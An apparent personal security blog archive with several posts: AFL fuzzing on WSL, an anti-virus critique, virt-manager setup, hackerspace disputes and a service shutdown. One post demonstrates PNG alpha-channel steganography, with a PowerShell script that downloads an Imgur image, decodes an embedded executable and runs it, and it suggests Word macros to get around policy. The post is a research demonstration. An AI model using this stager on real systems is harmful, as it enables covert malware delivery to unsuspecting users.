Friday, 10 February 2017

Running AFL on Bash for Windows

Recently I wrote about using Virtual Machine Manager in Bash on Windows (or Windows Subsystem for Linux aka "WSL"), and since then I have been playing around with getting other utilities I use in a native Linux environment.

One utility is American Fuzzy Lop (AFL), a fuzzing tool for finding vulnerabilities within Linux ELF binaries. It has been since ported to fuzz Windows PE binaries natively, but since we're able to run ELF binaries within WSL, why not fuzz them too?

If you're running Bash on Windows and have tried to compile AFL before, you probably have run into this problem:

shmget() failed

This error results from WSL having limitations on shared memory--specifically the lack of /dev/shm. By default, AFL will outright refuse to compile because these system functions simply do not exist.

One of the most recent builds of Bash on Windows includes support for shared memory functions that AFL requires in order to compile.
Along with support for the following shared-memory syscalls which are widely used by a number of Linux tools including PostgreSQL.

  • shmct
  • shmget
  • shmdt
  • shmat
The catch here is that the mainline Windows 10 version of WSL has yet to be updated to address this problem so you must be in the Windows Insider program in order to reap the benefits of these functions. Once you've enrolled and have updated, you can confirm the version of WSL by checking the version of Linux using uname.

If you're up to date you should see this version:
Linux mycomputer 4.4.0-43-Microsoft #1-Microsoft Wed Dec 31 14:42:53 PST 2014 x86_64 x86_64 x86_64 GNU/Linux
If you're not up to date then it'll show the following:
Linux mycomputer 3.4.0+ #1 PREEMPT Thu Aug 1 17:06:05 CST 2013 x86_64 x86_64 x86_64 GNU/Linux
Assuming you're successful you should be able to follow the instructions provided by AFL and begin fuzzing.


I'm still testing it out but at least we now know that it should compile and run fine on the surface. You will notice that the way the screen is drawn that it will look a bit wonky while running.

One thing I feel the need to add is if you're using an SSD, AFL is definitely a great way to reduce the lifespan of your drive. Instead, I recommend creating a RAM disk within Windows and then accessing it normally. I have tested ImDrive and it works just fine within WSL.

Friday, 27 January 2017

Anti-virus is worthless

I get a kick out of reading reactions by the anti-virus industry, rose-coloured glasses views from academia, or anecdotes from those who work in the IT industry whenever someone writes a constructive criticism of anti-virus solutions.

Let me put it out there before I go any further, Robert O'Callahan is correct when he says that you should disable your anti-virus solution--unless it came with your operating system such as it does in Windows 10. And for disclosure here: I did briefly work for an anti-virus vendor.

Whenever an argument is made for the value that anti-virus doesn't provide, you are bound to get the following reactions from anyone I mentioned before:

  • [Insert testing programme here] has given [AV product] the best detection rate in the industry for [year]!
  • I use [AV product] and I have never gotten malware.
  • [Software vendors] should open up their APIs to make anti-virus much easier to work with.
  • The anti-virus industry creates the malware.
  • If you went without anti-virus for [period of time] you'll eventually catch malware!
I could go on and on about these reactions but I think this well summarizes the absentmindedness that certain pro-anti-virus persons give:



It's obvious which light bulb a sane person would choose.

Tavis Ormandy has demonstrated extremely well through Google's Project Zero initiative (and before that with Sophail) that anti-virus applications have ticking time bombs sitting within their suites. From remote file retrieval, installing shady remote access tools, improper sandboxing, Node.JS debuggers, to permitting possible collisions in SSL certificates are just a sampling of the nearly five dozen vulnerabilities discovered by one single human being. 

That is just what is being published in the open. If you are aware of an anti-virus vulnerability, Zerodium will pay for remote code execution attacks. There have been suggestions that they go for at least $20,000 to $50,000 USD.

So let's pretend now that the problems with anti-virus being typically poorly coded just simply don't exist: are they still worth using?



No.

The commonly forgotten trait about anti-virus is that it either has to predict the malware's existence through heuristics or it has to have knowledge of its past artifacts via signatures. Both of these require teams of people to write the protections to handle either approach while at the same time being mindful of the fact that for every detection they make, they could be missing a thousand others. The dirty secret that the AV industry really hates to talk about is how their approach simply cannot scale.

Part of the approach that a majority anti-virus industry has opted to go about deflecting this is to add more value to their product by redefining themselves as "endpoint solutions". In the past decade, we've seen features like application whitelisting, web content filtering, and physical device control in order to make it seem like their product is more useful than if it was just simply doing AV.

Another angle to take is come out with outlandish claims that your product can detect everything using some new obscure method that nobody else in the industry has come up with. 

This is sort of the approach that Cylance has taken where they claim that their magic algorithm can stop malware even if they haven't seen it before. Unfortunately, there are lots of anecdotes that their product has an extremely high false positive rate which sort of makes sense if they can predict future malware: detect everything and anything without pause. 

However, testing their product and being open about what your experience with them is difficult because they require an NDA to get a proof of concept demonstration going in an enterprise environment. In one instance, a friend of mine was demonstrating it, posted about it on an open forum, and apparently Cylance responded negatively, citing the agreement. 

This job posting by them reveals a lot however:



I guess all of these contractual restrictions make sense seeing that the engine is likely coded in C#, as suggested in this job posting. The whole anti-virus industry relies on obfuscation of their practices and it's either going to be done by being closed source which is really everyone or by making it so nobody can actually poke around by stipulating such in a contract.

No vendor has a better approach than the other; they're all the same. You either have it never firing on actual malware or have it fire on everything as if it were Chicken Little.

So let's make some useful suggestions here on how to actually protect your computer:
  1. Use the anti-virus your operating system provides. If it doesn't have one, don't install one. Likely if it doesn't have one already, it's either a Mac, you run Linux, or your Compaq from 2005 needs to be replaced with something running Windows 10.
  2. Keep the operating system up to date. If Windows 10 rebooting on you is so inconvenient, you're a lost cause--the most recent update lets you defer up to a month by the way.
  3. Install ad blockers and use something other than Internet Explorer or Edge such as Chrome which sandboxes things fairly well.
  4. Don't follow random guides on the Internet to allow you to make changes to your system that somehow make things go "faster". More often than not they're done by people who don't know what they're doing.
  5. Don't use pirated software or pirate any content. Netflix is cheap, Spotify is free if you tolerate ads, and honestly there are tonnes of open source solutions for whatever you need to do.
Don't waste your money or bandwidth on an anti-virus solution that will just create more holes.

Anti-virus is worthless.

Tuesday, 20 December 2016

Windows 10, Virtual Machine Manager, and KVM

I really, really like the fact that Microsoft has embraced Linux in the form of releasing Ubuntu on Windows. To me, it's probably the first Linux on the desktop solution that was as good as using Linux itself without having to worry about using virtualization for my Windows applications and games. However, it's not exactly a true Linux kernel running behind the scenes and there are other things that will not simply work.

For one, out of the box you cannot use any X11 applications without an X server installed and some extra configuration. However, it is relatively painless to get this up and running and just as easy to get Virtual Machine Manager working as well. If you already have access to the KVM tools on the VM host, you will be able to use it remotely using an SSH connection from the Windows computer.

This is what we're going to need to install:

  • OpenSSH Client
  • Virtual Machine Manager
  • Python Spice GTK module

Assuming that you have already gone ahead and updated and configured Windows 10 to use the feature, you'll want to use Xming to act as your X server. There are other X servers you can consider, including MobaXterm and XvxSrv, but I prefer Xming due to its simplicity and the fact that it sits in the tray once you launch it.

Running XLaunch after installing Xming brings up this screen. Personally, I prefer having it set to multiple windows but of course you'll want to set this to your liking. You can leave the rest as defaults and it should be fine.

With the X Server out of the way, we'll want to configure Bash on Windows to automatically connect to the X server. This can be done by editing the .bashrc file in your home directory with the following at the end:

export DISPLAY=:0

Close and reopen Bash on Windows and it is ready to go. You can test out whether or not it works by installing something like GEdit or Xterm to see if it launches.

We do however have to enable D-Bus for use as Virtual Machine Manager depends on it. We can do this real quickly by performing the following command:

sudo sed -i 's$<listen>.*</listen>$<listen>tcp:host=localhost,port=0</listen>$'\ 
/etc/dbus-1/session.conf

Once this is done we can now proceed to install VMM.

sudo apt-get install python-spice-client-gtk virt-manager openssh-client
This shouldn't take too long and once it's done all we have to do is type the following command:

virt-manager

And here we are!


It should be noted that you cannot create virtual machines on your Windows 10 computer using this method--you're better off using HyperV if you want to go down this road. However, it is at this point that we can connect to a KVM host using SSH.

You'll want to configure OpenSSH within Bash on Windows first with key-based authentication to proceed but once that is done it's relatively simple to configure the system. Under the File menu, you'll see Add Connection which will ask you for some details:


You should see your VMs populate now:



And you can even use them as a console:


Enjoy.

Friday, 2 December 2016

Going viral on Imgur with Powershell and PNG

A few months ago, Kaspersky put out some research into using PNGs to distribute malicious payloads where malware authors had been embedding PE files into the images themselves. The give-away that something was amiss was the images had a 63x48 pixel resolution but were sized at 1.3 MB.

This isn't very stealth and there are ways to do this better.

Encoding a file within a PNG


First, it helps to understand a PNG file. Unlike JPEG, PNG is lossless even though it is compressed, meaning that when you create an image in the format, it retains the data that it has been generated until the resolution or colour pallette is modified. Unlike a GIF, a PNG file handles transparency through an alpha channel instead of colour substitution.

It's this compression and the alpha channel that will enable us to embed data into a PNG. Each pixel is represented by three 8-bit values for colour and another 8-bit values for transparency level (referred to as an "alpha channel"). This means that each pixel would be presented as R, G, B, and A with values from 0-255 on each.

Here's a sample image (sourced via Wikipedia) with what I am talking about:

This image is 800x600 pixels with 8-bit colour and an alpha channel, meaning that we have 480,000 pixels, or 468 KB of data that we can place within. Let's use Pillow and Python to mess with this.

Using the above script is relatively straightforward:

from PIL import Image
from sys import argv
from base64 import b64encode

i = argv[1]
o = argv[2]
with open(argv[3], 'rb') as f:
    text = f.read()

img_in = Image.open(i)
img_pad = img_in.size[0] * img_in.size[1]
text = b64encode(text)
if len(text) < img_pad:
    text = text + '\x00'*(img_pad - len(text))
else:
    print('File is too large to embed into the image.')
    quit()
text = [text[i:i+img_in.size[1]] for i in range(0, len(text), img_in.size[1])]

img_size = img_in.size
img_mode = img_in.mode
img_o = Image.new(img_mode, img_size)

for ih, tblock in zip(xrange(img_in.size[0]), text):
    for iv, an in zip(xrange(img_in.size[1]), [ord(x) for x in tblock]):
        x, y, z, a = img_in.getpixel((ih, iv))
        pixels = (x, y, z, an)
        img_o.putpixel((ih, iv), pixels)

img_o.save(o)

Executing it is as follows:

$ python encode.py image.png image_out.png payload.dat

When it runs, it ensures that the payload is not larger than the image can handle then encodes it using Base64 then pads it with null bytes until it reaches the size of the total number of pixels. Then the process of replacing each alpha channel value with the value of the character in the encoded data is done and then saved to disk.

Let's embed an image into an image shall we!


Inside of this image I've encoded a JPEG within it. The image has obviously changed towards a bit of a softer look with some jankiness in the transparency but you'd normally never think of it being suspicious. With some changes to the encoding process it is possible to make the alpha channel blend in a lot more naturally.

For the curious, this is the image that was embedded within:


This Python script can retrieve the data out of the image:

from PIL import Image
from sys import argv
from base64 import b64decode

i = argv[1]
o = ''
s = argv[2]

img = Image.open(i)

for x in xrange(img.size[0]):
    for y in xrange(img.size[1]):
        p = img.getpixel((x, y))
        p = p[-1]
        o = o + chr(p)

o = o.replace('\000', '')
o = b64decode(o)

with open(s, 'wb') as f:
    f.write(o)

We can confirm that nothing is lost by running these commands:

$ md5 blog_sample.png
MD5 (blog_sample.png) = 694ab6d3260933f75dec92ba01902f9b
$ python encoder.py blog_sample.png blog_sample.out.png antivirus.jpg
$ md5 blog_sample.out.png
MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
$ md5 antivirus.jpg
MD5 (antivirus.jpg) = 84893c561288b6a1a9d76f399a89d51b
$ python decoder.py blog_sample.out.png antivirus.orig.jpg
$ md5 antivirus.orig.jpg
MD5 (antivirus.orig.jpg) = 84893c561288b6a1a9d76f399a89d51b

As you can see the file contents do not change by the embedding of data within the image's alpha channel.

Let's use Imgur and Powershell to abuse this


Since its debut on Reddit, Imgur has become one of the largest image hosting services. This is largely due to its ease of access in uploading images without requiring anyone to create an account.

In tests, Imgur does appear to strip out data that doesn't belong to an image. That is, you cannot use a old technique where you combine a zip file with a JPEG or PNG on their service as it appears to outright strip the data.

Since we know that it'll remove these hybrid files, the question then becomes whether it removes the data we encode as demonstrated earlier. Let's try uploading the sample image from earlier and check.

$ md5 blog_sample.out.png
MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
$ wget https://i.imgur.com/Oj8FhU5.png
--2016-11-24 13:56:50--  https://i.imgur.com/Oj8FhU5.png
Resolving i.imgur.com... 151.101.52.193
Connecting to i.imgur.com|151.101.52.193|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 664208 (649K) [image/png]
Saving to: 'Oj8FhU5.png'

Oj8FhU5.png               100%[====================================>] 648.64K  2.42MB/s   in 0.3s

2016-11-24 13:56:51 (2.42 MB/s) - 'Oj8FhU5.png' saved [664208/664208]

$ md5 Oj8FhU5.png
MD5 (Oj8FhU5.png) = 10a4fd1bf52d0bfa50ced699f8c53c39

As we can see here, the file from earlier was uploaded to Imgur has not been altered.

So where do we go from here? How is this useful? Well to start, the thing that Imgur is great for is that you do not need to sign up with an account to upload an image. Why not use it to distribute malware without having to provide too many details?

One thing to be concerned about is that you have to have the ability to retrieve the PNG image and then process it as while there have been code execution issues with PNG libraries in the past, for the most part just loading a payloaded-image is unlikely to result in compromise.

Fortunately, Windows has built-in functions that straight up let you work with an image and extract the pixel data. This can be achieved using Powershell without any additional modules. The code is as follows:
Add-Type -AssemblyName System.Drawing 
Add-Type -AssemblyName System.Text.Encoding

$strURL = "http://i.imgur.com/nckqSN1.png"
$strFilename = "c:\temp\payloadb64.png"
$peOutputFile = "c:\temp\calc.exe"

Invoke-WebRequest -Uri $strURL -OutFile $strFilename

$image = [System.Drawing.Image]::FromFile($strFilename)
$peBase64 = @()
for ($w=0;$w -lt $image.Width;$w++)
{
    $row = @()
    for ($h=0;$h -lt $image.Height;$h++)
    {
        $pixel = ($image.GetPixel($w,$h)).A
        $pixel = [convert]::toint32($pixel, 10)
        $pixel = [char]$pixel
        $row += $pixel
    }
    $peBase64 = $peBase64 + $row 
}

$peImage = @()
foreach ($peValue in $peBase64)
{
    if ($peValue -ne "`0")
    {
        $peImage = $peImage += $peValue
    }
}

$peImage = [System.Convert]::FromBase64String($peImage)
[System.IO.File]::WriteAllBytes($peOutputFile, $peImage)
& $peOutputFile
The script works as follows:
  1. Download a PNG from Imgur and save it to disk
  2. Using System.Drawing, read every pixel and extract the alpha (A) value
  3. Ensure that all null values (0x00) are stripped from the array
  4. Decode Base64 and write file to disk
  5. Run the newly decoded file as an executable
And based on the above code, it of course executes calculator:


Executing the above code does require that your system's policy to allow the execution of Powershell scripts. That said, while on most home computers this is not an issue as it is disabled by default, many enterprise environments require this to be on. A way around any restrictions could be to execute the code with the help of VBScript and perhaps storing all of this within a Word macro.

Mitigation


One thing to keep in mind is that while the attack was done using Powershell, it doesn't mean that you couldn't achieve this with a Word document with an embedded macro. Avoiding executing any unwanted code is really the best way to go about avoiding this from an enduser perspective.

Imgur's response


Imgur did get back to me stating that while informative there isn't an immediate need to fix the issue due to the impact it presents.

Last Remark


I want to make it clear here that what I am showing with embedding data through a stenographic process is far from new, as it was one of the many challenges at this year's CSAW CTF qualifiers. It is a relatively common practice and there are many guides out there to read and software suites to use.

Also, yesterday, PortSwigger posted an article on doing something similar using JPEG files that was rather interesting.

Thursday, 1 December 2016

A follow up on Vancouver Hack Space

A few weeks ago, I penned an entry on my thoughts about the direction Vancouver Hack Space (VHS) had gone and what lead to my decision to ultimately leave it. My opinion about the matter has not changed but there were comments left and I would like to reply to them.

I should be clear that I am not going to direct the replies necessarily at the commenters themselves, so please forgive me if you feel like I am finger pointing at any specific individuals.

I think it's interesting that you're pining for a VERSION of VHS, rather than evaluating what VHS has become. It's entirely valid to feel that what you're personally looking for in a hackspace is no longer found at VHS, but personally I think that the "be everything to everyone" attitude is a great model.

The reason for why I left the space was primarily because it was having a larger toxic element to it than it did before and there were individuals who felt like it was better to have a top-down approach to dealing with matters than a consensus approach where everybody who was a member had a say in things.

The "be everything to everyone" model was something that creeped into VHS over time and lead to being too inviting, meaning that while we wanted people who didn't know anything to learn, we didn't want people who didn't want to learn to join. There are people at VHS now who do nothing more than exist as a VHS member, adding no value other than saying that they're a member or to occupy space for a hobby that is hard to get into--such as the amateur radio station.

If you prefer a version of VHS yourself that is losing over a dozen members each month based on how I describe it then so be it. I am not sure why you'd want a space that allows members who engage in harassment towards others with little resolve but whatever keeps you happy I guess. Your space is not immune from criticism just as much as my opinion isn't either.

He's since been banned from the space for stealing VHS property (a web domain) and continues to (in my opinion, though he's at least polite about it) harass current and potential members on social media "warning" them about the toxic environment, that he himself has created.

I'm glad to hear that the space has taken steps to ban someone from the space for stealing a domain, but am dismayed that you see his opining on how toxic the environment constitutes as harassment. If he (like myself) believes that something is toxic to be part of, he has every right to tell someone about it. This is not harassment.

If VHS were truly about stopping harassment, it needs to look within. I was corrected on the membership status (or lack there of) of the individual I mentioned in my original piece, but he is still actively a part of the space and is encouraged to be there by the same individual who was harassing the person that VHS had banished. This to me is enough to say that VHS is a toxic space.

Banning someone from the space is only required when you're dealing with real problems. Someone who has been banned from other groups and is harassing members (such as myself) should be an immediate ban. Someone who has had the cops called on them at the space and has possibly been involved in the destruction of a member's project should face an immediate ban. The fact that the decision to ban someone is being made but other examples are being overlooked tells me that there is a vindictive nature to the board and it's not healthy.

For the record, when I was still actively involved in VHS, this person had been banned before already and he was the second one to have been banned to begin with. The other person who was banned was banned because they came to borrow an angle grinder for the purposes of removing a bike lock for the second time in two weeks--there were other incidents that lead to this decision but this was the final straw.

As much as it pains me to say this, looking at how Noisebridge deals with this is sort of a way to learn from this all.

As for queer members, there's at least me, I agree that's not much, but from the people that I've seen coming to the open nights, it's not exactly a case of not making the space seem safe as much as perhaps not advertising the space's existence in the correct places?

I'm happy to hear that there are members of the LGBTQ community that take the time to be part of the space, but my point about how it presents itself as a bunch of white males does not change. The space doesn't need to advertise better.

VHS is a cheap place to use a laser cutter. That's about it these days. There are still some excellent people down there that only know it in its current form, and that's unfortunate. 

VHS has a tonne of good equipment and that should draw in people to use it. If you're losing so many members per month but have all of this great gear, what do you suppose the reasons behind it are?

The fact that this isn't being addressed and instead you're looking to do silly things like make a member-in-residence role where they maintain the space during its off-hours and not have to pay membership dues tells me that there are problems being overlooked. We never considered this and while there were times people were being messy with stuff being left behind out of order, it never got to the point where we needed anyone to come in and clean it up regularly.

first kudo's if you were one of the founding members of the Hackspace

This isn't the case. Vancouver Hack Space formed in early 2009, but I had joined in July that year but not at the point of its formation. You can say that I was one of the original members of the space (like the first dozen or two) but I do not count myself as a "founding member". I guess legally I can say I was a founding member as I believe I was one of the original signatories as per the Societies Act, but my memory is fuzzy on this one.

I believe that no founding member nor anyone pre-2010 is still a member of VHS in good standing.

Apparently in those days you also had to "Disclose your motives and affiliations" - number 5 on the list of "Principles of Unity"

There was a good reason for this and that was to prevent people from usurping the space and using it for their own political purposes--VHS was intended at its start to be as apolitical as it could be.

Prior to the 2010 Winter Olympics, anyone associated with any group that was against the Olympics or anything associated to it were being harassed by the RCMP and Vancouver Police Department. A number of the original members who founded the space or were part of it in its early days had found themselves either being followed or documented due to their involvement or relationship to these groups. I do know for a fact that I was being targeted even though my affiliation with these groups was purely through friendship and association--I never participated with any of these groups either and for the record I actually attended a curling match during the games.

We had instances where independent media groups had asked us to use the space so they could work on their video projects--we said no. We had people who wanted to throw some party during the Olympics--we said no. It wasn't easy but we did our damnedest to avoid being affiliated directly with any political movement.

We also suspected that the space had been bugged at one point although it is tough to say whether or it was true or if we were just being overly paranoid--it would have not been hard to hide such things in 45W and with more and more I learn about surveillance it's hard to believe otherwise.

When you joined VHS, we wanted to know why you were interested in being part of it. Was it to learn? Was it to pitch a multi-million dollar shitheap of a startup? Or was it because you wanted to make the space into something of your own?

These original rules of VHS served us well and the fact that today you proudly display a code of conduct and by-laws tells me that the space has gone from being a place that would do cool things to a place that really is a maker space and nothing more. To me, VHS has gone from being a hackerspace to a non-profit tech shop--the front page proudly demonstrates that by stating "[the] community garage for a community without garages".

There is nothing wrong with it becoming this, but it would be less of a problem to me if the element of harassment was dealt with appropriately and it kept the same diversity it had when VHS was really at its peak in 2012/2013.

My other comment is about the wall in the "Bunker" space - it was there for a reason, that being to keep dust out of the common area and also reduce the noise - not to segregate one activity from another.

I know why the wall was put up and completely understand this. My point was a philosophical one.

I want to say openly that there are people who are still involved with VHS that I still respect and I do hope that while I am lambasting what it has become that they don't see me as someone who is engaging in harassment towards it and its members.

Closing off, I have had a few members reach out to me about my opinions and I do want to address two things.

For one thing, I was corrected that the harassing individual is not listed as a member of the space. While I am happy to hear this, I still believe that his existence at the space on some sort of interval is a symptom of the problems the space is facing that ultimately lead to me not wanting to be around. The fact that he is associated (either as an acquaintance or an actual friend I do not know) with the individual that had the VPD called on them is even more alarming.

Secondly, while I appreciate being asked on how to fix the space, I actually don't want to. It's not that it can't be fixed, but VHS has sort of succumbed to the Ship of Theseus paradox, where while it's VHS in name, it's not it's not the same VHS we started off at.

I appreciate those coming out to offer their comments and asking questions, but my opinion is that VHS has become something I don't care for any longer.

Monday, 21 November 2016

Shutting down Canario

On December 16th, I intend to shut down Canario (formerly Canary)--and by “Canario”, I mean the service, not the company, of which I will explain later.

The reasons for this are simple: I am starting a new project in the new year and unfortunately cannot put effort into it without removing something else--and with that, Canario has to go.

The decision has been quite difficult because it has taught me a lot about what I can do as a single individual, but at the same time it also taught me of my limitations. I’ve had a few people work with me on Canario over the course of the past four years, but the vast majority of its heavy lifting, maintenance, development, and research has been me and me alone. Overall it has been a tiring experience, but far from anywhere near a regret and really rewarding.

The journey towards ending it started around the summertime when I was playing around with the idea of rebuilding it to be more like other services such as HaveIBeenPwned. I like how Troy Hunt has gone and made it very simple but one aspect I’ve always found lacking about it was that using it for research purposes was very limited. Having said that, his goal isn’t to provide those capabilities but rather to help inform those of when their information has been compromised and or exposed.

As I had gone about in developing this this new capability, I had been sitting on an idea completely different from Canario but kept thinking about it as just a novel idea with little additional thought. However, in September, I found myself looking into the idea a bit further, doing some research into other similar things (I am being vague here yes) that were otherwise lacking in features. I came to the conclusion that this idea would be something worth pursuing. I can make it fund itself with a lot less effort and be able to get people involved with again a lot less effort.

Circling back, Canario has four big problems for me:

  1. The type of data I am working with is never uniform and never will be. Someone posting a data dump on Pastebin or any other service is going to almost always have it in some unique format where there may be similarities to past dumps, but never enough for me to just automate to near perfection.
  2. Getting exposed data that isn’t publicly available has so many complications. I have become pretty adept at finding this data, but trying to get people to come to me with that data in the same way others have succeeded has proven to be unsuccessful on my part.
  3. Trying to get others on-board to work with me has been difficult at best. I’ve had cases where people wanted to get involved but wanted to have strings attached or where they wanted to contribute data but I wasn’t permitted to sell access to it.
  4. Other people and organisations are doing a better job than me and will continue to do so.

The latter part is really more of a sore point as I have tried to reach out to people but being that by the time I had started to do this, there were others in the space already and trying to improve what I had already done was going to be difficult.

To add to this, I was funding the project out of my own pocket and contributing my free time, so in some ways I wonder if I was being blinded by my egotism to go about it my own way and not let others interfere. One of the difficulties I had overall was trying to come up with a model that would allow it to be self-financed, but every time I’d come up with a model that could work I found it to be very onerous and likely to be of no benefit in the long term.

Having said all that, Canario taught me database design dos and don’ts (and also taught me to hate MySQL and embrace Postgres), allowed me to speak at conferences, has gotten me cited in the media, and it even gave me an opportunity to speak at Facebook to talk about threat intelligence, a topic that I have a lot of mixed opinions about.

So what next?

First of all, when I do close off the service, it’ll just be a hard shutdown. As it stands right now, I have not added any new data since November 15th and I will be leaving it all in place until sometime on December 16th. All user accounts and associated data will be permanently deleted as I do not wish to hold on to this data any further. I’ll do my best to clear up any backup data I have sitting around but for certain the live data will be gone.

All data that has been collected will no longer be available via the site--so search and data viewing will cease to function. If there are requests for copies of the database (again, without user data), I’ll consider them but likely it will not be free and will be as-is--if you plead your case on the “not free” part I’ll hear it.

Second of all, I am starting a new project and I am trying to get others involved. It’s not a pure information security project but at the same time it’s the core aspect of it. I want to make it easier for schools and small businesses to be able to do specific things. Additionally, Canario will continue as a legal entity, acting as a parent to the project.

Obviously right now I am being a bit hush-hush on this idea of mine, but if you’re interested in working with me on this and understand networking and cryptography, let me know--there’s your hint to what I am working on. Aspects of it are going to be open-source.

Monday, 14 November 2016

Why I left Vancouver Hack Space


I recently became aware a fellow former member of Vancouver Hack Space (VHS)'s blog post about alternatives to the hackerspace in light of it becoming a rather toxic environment. A few years ago, I had penned a draft piece about why I chose to leave but never bothered to publish it. After having seen someone else's disgust for what it has become, I have decided to speak up.

One way to start is to show what VHS looked like in 2009 when I had originally joined (my old iBook is visible in the shot too):


This was the first un-shared physical space that VHS occupied, a room that was barely larger than my living room being used by twenty or so people who all had the same goal in mind: do cool shit. On my first night there, I was enamoured and immediately signed myself as a member.

For me, it was the start of a lot of things: I met a lot of great people, made friends, furthered my own career, and learnt new things--it contributed to me being a better person overall. When I found myself working downtown after leaving my job in Surrey, I was able to put more time into the space and was able to leave work and go straight there to hangout.

VHS had spun up a lot of cool projects or was at least the catalyst for bigger things. The best one I can think of is Mini Maker Faire Vancouver, which otherwise may have never happened if it weren't for the space. Two startups come to mind that have changed the personal lives of members for the better and again it may have not been this way if it were not for VHS' existence.

I think that around the time that VHS started to need a new space and that there were new members coming in was the time I started to lose interest in being an active member. For a while, I would still go on a regular basis, but found myself as time went on that the space was changing and it was changing for the worst. When it left its location on Hastings Street for a larger one on East 1st Avenue, it was pretty much the end for me and the place because it had already become something that it shouldn't have been.

The aforementioned blog piece I mentioned stemmed from a variety of abuses directed at someone who spoke out. This was posted to the members-only discussion forum back in May:
Someone cleaned out my locker and stole some of the items in the locker, others item ended up in the drop box. This happens between Thursday May 5th, and May 11th. My locker was not locked, but was labeled with my name and there was a note in the locker that said "[person's] locker, not free, not available"
You have a thief and an asshole at the space. More bad people.
I don't suggest leaving anything of value at the space any more.
Back when VHS was smaller, this behaviour where items were stolen was exceedingly rare to the point where it was more often things getting misplaced, borrowed, or general ignorance--and even then I am failing to remember if and when these circumstances. We were generally better at keeping assholes out of the space and I would argue that until the move away from Hastings Street that the unwritten policy for how it was done went fairly well.

An example of a toxic individual being removed successfully was one person who came to the space in 2012 for one of our Super Happy Hacker Houses (SHHH). This was a periodic event we'd host where we'd have a keg, some music, lots of people, and then the later part of the evening devoted to three minute lightning talks where one could talk about whatever cool topics we had in mind--I had previously given talks on generating tripcodes, lock-picking, and Python to name a few.

This individual that evening chose a rather thoughtless talk: stealing credit card numbers from the wireless network at the Vancouver Public Library. It didn't get too much attention as it was towards the tail end of the evening, but it continued on the IRC channel later on. I ended up calling this person out on this, citing that it was fairly idiotic from an operational security point of view to openly admit that you were looking to commit fraud. His response was to use some uncreative insults, resulting in his removal from the IRC channel and was then made aware that he was not welcomed at VHS.

I'd say that this person's story with me ended there but he would later attempt to include himself in VanCitySec a few years later, resulting in him being removed from the IRC channel as well. He was then removed from being able to attend BSides Vancouver and then finally removed from OWASP's Vancouver chapter after he went off on the organizers and the speaker after the event had concluded when someone had enough of him interrupting their conversations. At an extreme level, he even managed to get a visit by the local police after he had admitted to intrusion on the wireless networks of the local transit agency.

It didn't help that later on I found out that he was harassing a friend of mine at a local meetup.

To this day, I still get him periodically showing up in the various Freenode channels I am in, taunting me over some non-existent botnet that he suspects I run. In almost all cases he ends up getting himself removed from the channel after I realise who he is.

In fairness, I do believe that he has some rather difficult problems to overcome (I have had people show me some aspects of his personal history that were troubling), but one of the things that I have learnt is that even if you know a reason for why someone exhibits shitty behaviour towards you or someone else, it is not something you have to sign up for and you should be able to remove that person if you feel it is necessary.

The reason why I bring up this person in particular is because he was the final straw for me deciding to leave the space: he was making an appearance again and I was finding it problematic that nobody was enforcing the ban--this was before the remarks about OWASP and the local meetup I should add.

When I spoke up on the mailing list, the response I got from someone who later ended up having someone at the space call the police on them was that he had every right to be in there--funny how assholes defend other assholes. At a meeting, he was eventually formally banned but after a year the ban had apparently expired in space's own words "[person] has since expired and he is welcome back at VHS".

I recently learnt that he had joined the hackspace after another encounter with him on Freenode, citing that I was an impediment to his membership. Of course, when he was banned in the first place, I had three people contact me privately letting me know that whatever decision VHS made would influence whether or not they'd be members.

This is not the only story involving harassment that I could bring up but this one I have first-hand knowledge of. I'm also exempting his name from this entry because I do not wish to attract his attention.

One of the things I can point out is that the whole makeup of how VHS is run and operated has changed since its beginnings. I'll use this photo as an example from the 2014 AGM:

Photo: VHS AGM 2014 Group Photo

In this photo, there are twelve men. I don't take exception to seeing twelve men but I damn well know that in the past we had women as members, especially who served as board members--I'll clarify something about how this "board" works or rather used to in a bit. Hell, even the aforementioned Maker Faire event was put on for the first few years by someone who I cannot say enough good things about her in terms of creativity and organizational skills. The fact that in 2014, six years after VHS was founded that it would still show a mostly male face even though it is apparent there are female members and those from the LGBTQ community amongst the membership is downright distressing.

The board that VHS has was originally created to satisfy the requirements of the Societies Act, a law that governs non-profits and other like-minded organizations in British Columbia. I served two years on the board and we only officially met when it was time for our annual general meeting, which again was a requirement of the act. Its sole purpose was to satisfy those legal requirements and to make insurance easier for us to get, but since then the board has morphed into an overseeing eye, drafting policy and everything, which was beyond what VHS was meant to be.

All in all, by the time that the person was banned after discussion amongst members of the space, the board had become something that oversaw everything and VHS was something that it wasn't when I first joined five years earlier. The writing on the wall should have been apparent when walls were erected to keep the woodworking away from the rest of the space that things were going to change. When the ham operator group formed within VHS and wanted to form a society within the society for the purposes of getting government grants for themselves and themselves alone, I knew that my time was done.

Since then, I have visited the space once at its Cook Street location and while it definitely is still a hackerspace, the original vibe it had years prior is not there. It doesn't feel like it's doing anything challenging and while there members there I still respect and chat with periodically, I cannot say that I want anything to do with the organization.

Today, I find myself going to VanCitySec, other local security events, and am friends with people who share the same ethos that I do, but it is really saddening that a space like VHS in 2009 is no more and I believe that the only reason it died was because it wanted to be everything to everyone. The original space is something I truly miss.

Sometimes it's hard to notice that you're becoming a victim of your own success and eventually you miss the forest from the trees.